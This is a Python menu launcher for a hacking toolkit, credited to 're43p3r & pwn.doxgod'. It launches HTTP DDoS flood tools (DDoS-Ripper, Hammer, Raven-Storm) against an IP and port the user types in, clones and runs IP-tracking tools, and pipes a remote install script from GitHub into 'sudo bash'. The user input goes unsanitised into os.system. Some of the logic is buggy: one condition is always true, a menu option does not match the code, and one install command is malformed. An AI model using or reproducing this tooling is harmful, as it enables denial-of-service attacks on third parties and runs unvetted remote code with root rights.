import os
import time
from os import system, name
from time import sleep

X = str(input("Freak to start me :):"))

if 'Freak' or 'Feak' in X:
       os.system(' clear ')
       print("                       WHO ARE YOU?                  ")
       print("                      :>3qKKKKKKKq3>:                ")
       print("                  ';CpKKKKKKKKKKKKKKKpC;'            ")
       print("              -iPKKKKKKKKKKKKKKKKKKKKKKKPi-          ")
       print("          `~v]KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK]v~`    ")
       print("       ,rwKKKKKKKKKKKKKPv;,:'-':,;vPKKKKKKKKKKKKKwr, ")
       print("      !KKKKKKKKKKKKKKK/             !KKKKKKKKKKKKKKK!")
       print("      !KKKKKKKKKKKKKKf               CKKKKKKKKKKKKKK!")
       print("      !KKKKKKKKKKKKKp-               -qKKKKKKKKKKKKK!")
       print("      !KKKKKKKKKKKKK>"               "\KKKKKKKKKKKKK!")
       print("      !KKKKKKKw;,_'-                   .-:,wKKKKKKK! ")
       print("      !KKKKKKKKhi*                      KKKKKKKKKKKK ")
       print("      !KKKKKKKKKKKKK;                 ;KKKKKKKKKKKKK!")
       print("      !KKKKKKKKKKKKK2>'             '>2KKKKKKKKKKKKK!")
       print("      !KKKKKKKKKKKKKKKZ             ZKKKKKKKKKKKKKKK!")
       print("      !KKKKKKKKKKKKKKK5             eKKKKKKKKKKKKKKK!")
       print("      !KKKKKKKKKKKqC;-               -;CqKKKKKKKKKKK!")
       print("      <KKKKKKKKkr,                       ,rSKKKKKKKK<")
       print("       -v]qj;-                             -;jq]v-   ")
       time.sleep(1.0)
       os.system(' clear ')
       print(" ____  ____  _____   ____  ____  ___  ____    _____  ____  ____  ____  ____ ")
       print("(  _ \(  _ \(  _  ) (_  _)( ___)/ __)(_  _)  (  _  )(  _ \(  _ \(_  _)(_  _ ")
       print(" )___/ )   / )(_)( .-_)(   )__)( (__   )(     )(_)(  )   / ) _ < _)(_   )(  ")
       print("(__)  (_)\_)(_____)\____) (____)\___) (__)   (_____)(_)\_)(____/(____) (__) ")
       print("         Created By re43p3r & pwn.doxgod                                    ")
       time.sleep(1.0)
       os.system(' clear ')
       print("..............................................................................")
       print(": ____  ____  _____   ____  ____  ___  ____    _____  ____  ____  ____  ____ :")
       print(":(  _ \(  _ \(  _  ) (_  _)( ___)/ __)(_  _)  (  _  )(  _ \(  _ \(_  _)(_  _ :")
       print(": )___/ )   / )(_)( .-_)(   )__)( (__   )(     )(_)(  )   / ) _ < _)(_   )(  :")
       print(":(__)  (_)\_)(_____)\____) (____)\___) (__)   (_____)(_)\_)(____/(____) (__) :")
       print(":............................................................................:")
       print(":...............................HTTP DDOS....................................:")
       print(":option A: DDoS-Ripper                                                       :")
       print(":option B: DDoS-Hammer                                                       :")
       print(":option C: Raven-Storm                                                       :")
       print(":...............................misc options.................................:")
       print(":option Y: install all requirements ::: this is required                     :")
       print(":option W: view banners and people who made this script                      :")
       print(":............................................................................:")
       print("                           IP Locators                                        ")
       print("..............................................................................")
       print("option E: track-ip                                                            ")
       print("option F IP-Tracker                                                           ")
       print("..............................................................................")
       print("                            Port Scanners                                     ")
       print("..............................................................................")
       print("option G Nmap                                                                 ")
       print("option H nikto                                                                ")
       print("..............................................................................")
       print("                               Credits:                                       ")
       print("..............................................................................")
       print(" @re43p3r @pwn.doxgod                                                         ")
       print("..............................................................................")
       
S = str(input("option here:"))

if 'Z' in S:
       time.sleep(2)
       print("..............................................................................")
       print(": ____  ____  _____   ____  ____  ___  ____    _____  ____  ____  ____  ____ :")
       print(":(  _ \(  _ \(  _  ) (_  _)( ___)/ __)(_  _)  (  _  )(  _ \(  _ \(_  _)(_  _ :")
       print(": )___/ )   / )(_)( .-_)(   )__)( (__   )(     )(_)(  )   / ) _ < _)(_   )(  :")
       print(":(__)  (_)\_)(_____)\____) (____)\___) (__)   (_____)(_)\_)(____/(____) (__) :")
       print(":............................................................................:")
       print(": you should F0LL0W these Amazing People                                     :")
       print(":............................................................................:")
       os.system(' clear ')
       time.sleep(1)
       print("..............................................................................")
       print(": ____  ____  _____   ____  ____  ___  ____    _____  ____  ____  ____  ____ :")
       print(":(  _ \(  _ \(  _  ) (_  _)( ___)/ __)(_  _)  (  _  )(  _ \(  _ \(_  _)(_  _ :")
       print(": )___/ )   / )(_)( .-_)(   )__)( (__   )(     )(_)(  )   / ) _ < _)(_   )(  :")
       print(":(__)  (_)\_)(_____)\____) (____)\___) (__)   (_____)(_)\_)(____/(____) (__) :")
       print(":............................................................................:")
       print(": instagram: re43p3r                                                         :")
       print(": instagram: pwn.doxgod                                                      :")
       print(":............................................................................:")
       print(":.............................NOTICE.........................................:")
       print(": ME AND THE CREATORS ARE NOT RESPONSIBLE FOR ANY MISUSE OF THESE TOOLS OR   :")
       print(": THIS FRAMEWORK, WE HIGHLY ADVISE YOU DO NOT USE THIS FOR ILLIGAL ACTIONS   :")
       print(":............................................................................:")


if 'A' in S:
       time.sleep(2)
       os.system(' clear ')
       print("..............................................................................")
       print(": ____  ____  _____   ____  ____  ___  ____    _____  ____  ____  ____  ____ :")
       print(":(  _ \(  _ \(  _  ) (_  _)( ___)/ __)(_  _)  (  _  )(  _ \(  _ \(_  _)(_  _ :")
       print(": )___/ )   / )(_)( .-_)(   )__)( (__   )(     )(_)(  )   / ) _ < _)(_   )(  :")
       print(":(__)  (_)\_)(_____)\____) (____)\___) (__)   (_____)(_)\_)(____/(____) (__) :")
       print(":............................................................................:")
       O = str(input(" whats the IP youngling: "))
       V = str(input(" and the port young one: "))
       os.system(f' python3 DRipper.py -s {O} -p {V} ')

if 'B' in S:
       time.sleep(1)
       os.system(' clear ')
       print("..............................................................................")
       print(": ____  ____  _____   ____  ____  ___  ____    _____  ____  ____  ____  ____ :")
       print(":(  _ \(  _ \(  _  ) (_  _)( ___)/ __)(_  _)  (  _  )(  _ \(  _ \(_  _)(_  _ :")
       print(": )___/ )   / )(_)( .-_)(   )__)( (__   )(     )(_)(  )   / ) _ < _)(_   )(  :")
       print(":(__)  (_)\_)(_____)\____) (____)\___) (__)   (_____)(_)\_)(____/(____) (__) :")
       print(":............................................................................:")
       B = str(input(" I P A : "))
       A = str(input(" P O R T : "))
       os.system(f' python3 Hammer.py -s {B} -p {A} ')

if 'C' in S:
       os.system(' clear ')
       time.sleep(2)
       print("..............................................................................")
       print(": ____  ____  _____   ____  ____  ___  ____    _____  ____  ____  ____  ____ :")
       print(":(  _ \(  _ \(  _  ) (_  _)( ___)/ __)(_  _)  (  _  )(  _ \(  _ \(_  _)(_  _ :")
       print(": )___/ )   / )(_)( .-_)(   )__)( (__   )(     )(_)(  )   / ) _ < _)(_   )(  :")
       print(":(__)  (_)\_)(_____)\____) (____)\___) (__)   (_____)(_)\_)(____/(____) (__) :")
       print(":............................................................................:")
       os.system(' curl -s https://raw.githubusercontent.com/Taguar258/Raven-Storm/master/install.sh | sudo bash -s && rst ')
       
if 'E' in S:
    time.sleep(2)
    os.system(' clear ')
     
    os.system(' git clone https://github.com/htr-tech/track-ip && cd track-ip && chmod +x * && ./trackip ')
       
if 'F' in S:
    time.sleep(2)
    os.system(' clear ')
    
    os.system(' git clone https://github.com/anonymousproo/IP-Tracker && cd IP-Tracker && python IP-Tracker.py ')
       
if 'G' in S:
    time.sleep(2)
    os.system(' clear ')
     
    os.system(' apt install nmap -y ')
       
if 'H' in S:
    time.sleep(2)
    os.system(' clear ')
    
    os.system(' sudo apt install perl git clone https://github.com/sullo/nikto && cd nikto && cd program ')
